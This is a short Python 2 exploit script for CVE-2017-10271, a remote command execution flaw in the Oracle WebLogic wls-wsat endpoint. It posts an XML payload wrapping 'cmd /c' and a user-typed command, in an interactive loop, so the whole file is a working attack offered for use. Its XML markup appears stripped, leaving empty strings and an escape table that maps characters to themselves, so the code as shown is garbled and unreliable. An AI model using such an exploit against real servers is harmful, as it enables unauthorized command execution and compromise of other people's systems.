import requests
import sys
url_in = sys.argv[1]
payload_url = url_in + "/wls-wsat/CoordinatorPortType"
payload_header = {'content-type': 'text/xml'}
def payload_command (command_in):
html_escape_table = {
"&": "&",
'"': """,
"'": "'",
">": ">",
"<": "<",
}
command_filtered = ""+"".join(html_escape_table.get(c, c) for c in command_in)+""
payload_1 = " \n" \
" " \
" \n" \
" \n" \
" \n" \
" " \
" " \
" cmd " \
" " \
" " \
" /c " \
" " \
" " \
+ command_filtered + \
" " \
" " \
" " \
" " \
" " \
" " \
" " \
" " \
""
return payload_1
def do_post(command_in):
result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
if result.status_code == 500:
print "Command Executed \n"
else:
print "Something Went Wrong \n"
print "***************************************************** \n" \
"**************** Coded By 1337g ****************** \n" \
"* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \
"***************************************************** \n"
while 1:
command_in = raw_input("Eneter your command here: ")
if command_in == "exit" : exit(0)
do_post(command_in)